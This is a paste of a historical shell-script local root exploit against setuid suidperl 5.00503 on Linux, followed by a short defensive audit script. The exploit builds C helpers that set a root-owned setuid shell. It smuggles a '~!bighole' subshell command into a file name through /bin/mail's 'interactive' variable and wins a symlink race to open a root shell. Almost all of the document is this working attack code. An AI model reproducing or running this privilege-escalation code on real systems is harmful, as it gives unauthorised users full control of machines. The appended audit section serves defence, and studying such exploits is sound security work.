Exploit.Unix.Local.f/Suidperl 5.00503 - Root Exploit

Jul 8th, 2023
#!/bin/sh

#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting an undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, the buggy code has the following comment inside:
# /* heh, heh */. I guess the author wasn't laughing last.
#
# Development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it was useless (who wants to notify root?).
# I deleted my test code and didn't leave any notes on it. Then, a month after
# this discovery, Sebastian contacted me. He was working on a perl exploit.
# He told me he didn't know how to cause this condition to happen, but
# if he realised how he could do it, he'd be able to use an undocumented /bin/mail
# feature - environmental variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on a terminal. And then I understood what I'd done. I spent the next month
# (yes! no kidding!) trying to recall what the fsck the condition was. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in a rather short, but reasonable time window in
# order to exploit it. I tested it on a fast, not overloaded Linux box, and
# I guess on slow machines it needs tuning. It needs anything setuid
# (/usr/bin/passwd is just fine), a writable working directory and something
# around 4 minutes. The working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when the system is not overloaded and not used
# (e.g. at night).
#
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thanks to several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#

clear

echo "Suidperl 5.00503 (and newer) root exploit"
echo "-----------------------------------------"
echo "Written by Michal Zalewski <lcamtuf@dione.ids.pl>"
echo "With great respect to Sebastian Krahmer..."
echo

SUIDPERL=/usr/bin/suidperl
SUIDBIN=/usr/bin/passwd

echo "[*] Using suidperl=$SUIDPERL, suidbin=$SUIDBIN..."

if [ ! -u $SUIDPERL ]; then
  echo "[-] Sorry, $SUIDPERL is NOT setuid on this system or"
  echo "    does not exist at all. If there's a +s perl binary available,"
  echo "    please change the SUIDPERL variable within the exploit code."
  echo
  exit 0
fi


if [ ! -u $SUIDBIN ]; then
  echo "[-] Sorry, $SUIDBIN is NOT setuid on this system or does not exist at"
  echo "    all. Please pick any other +s binary and change the SUIDBIN variable"
  echo "    within the exploit code."
  echo
  exit 0
fi

echo "[+] Checks passed, compiling flares and helper applications..."
echo

cat >flare <<__eof__
#!/usr/bin/suidperl

print "Nothing can stop me now...\n";

__eof__

cat >bighole.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  chown("sush",0,0);
  chmod("sush",04755);
}
__eof__

cat >sush.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  system("/bin/bash");
}
__eof__

make bighole sush

echo

if [ ! -x ./sush ]; then
  echo "[-] Oops, seems to me I cannot compile helper applications. Either"
  echo "    you don't have a working 'make' or 'gcc' utility. If possible,"
  echo "    please compile bighole.c and sush.c manually (to bighole and sush)."
  echo
  exit 0
fi

echo "[+] Setting up environment..."

chmod 4755 ./flare

FILENAME='none

~!bighole

'
export interactive=1
PATH=.:$PATH

echo "[+] Starting exploit. It could take up to 5 minutes in order to get"
echo "[+] a working root shell. WARNING - WARNING - WARNING: it could cause"
echo "[+] heavy system load."

while :; do
  ( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILENAME" <./flare & ) &>/dev/null &
  ( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
  if [ -u ./sush ]; then
    echo
    echo "[+] VOILA, BABE :-) Entering rootshell..."
    echo
    rm -f "$FILENAME" sush.c bighole bighole.c flare
    ./sush
    echo
    echo "[+] Thank you for using Marchew Industries / dupa.ryba products."
    echo
    rm -f "$FILENAME" sush.c bighole bighole.c flare sush
    exit 0
  fi
done
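A defensive audit script, added here and not part of Zalewski's exploit, that reports the preconditions the comments above spell out: a setuid perl interpreter (suidperl/sperl), a writable working directory mounted without nosuid or noexec, and the `interactive` variable that /bin/mail honours. The directories searched and the /proc/mounts-style input format are assumptions.

```shell
#!/bin/sh
# Added defensive audit; not part of the original exploit. It reports the
# conditions the exploit needs rather than triggering anything.

# Print every setuid perl interpreter (suidperl*/sperl*) under the given
# directories. The directory list is supplied by the caller (assumption).
find_suid_perl() {
  for d in "$@"; do
    [ -d "$d" ] || continue
    find "$d" -type f -perm -4000 \
      \( -name 'suidperl*' -o -name 'sperl*' \) 2>/dev/null
  done
}

# Read a mount table in /proc/mounts format (dev mnt fstype opts ...) from
# stdin and print one line per mountpoint lacking nosuid or noexec, the two
# options the comments say make a working directory unusable for the attack.
weak_mounts() {
  while read -r _dev mnt _fstype opts _rest; do
    [ -n "$mnt" ] || continue
    case ",$opts," in *,nosuid,*) ;; *) echo "$mnt: missing nosuid" ;; esac
    case ",$opts," in *,noexec,*) ;; *) echo "$mnt: missing noexec" ;; esac
  done
}

# /bin/mail's ~! handling is switched on by the 'interactive' variable;
# report if it is set at all (even empty) in the current environment.
check_interactive_env() {
  if [ -n "${interactive+x}" ]; then
    echo "interactive is set in the environment; unset it before suid helpers run"
    return 1
  fi
  return 0
}

# Run all three checks against the live system.
audit_live() {
  echo "== setuid perl interpreters =="
  find_suid_perl /usr/bin /usr/local/bin /bin
  echo "== mounts lacking nosuid/noexec =="
  [ -r /proc/mounts ] && weak_mounts </proc/mounts
  echo "== environment =="
  check_interactive_env
}
```

Mounts that should never host untrusted writable data (for example /tmp or /var/tmp) are the ones whose lines from weak_mounts matter; the remediation for the first check is simply to clear the setuid bit on the reported interpreter.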
Tags: Exploit unix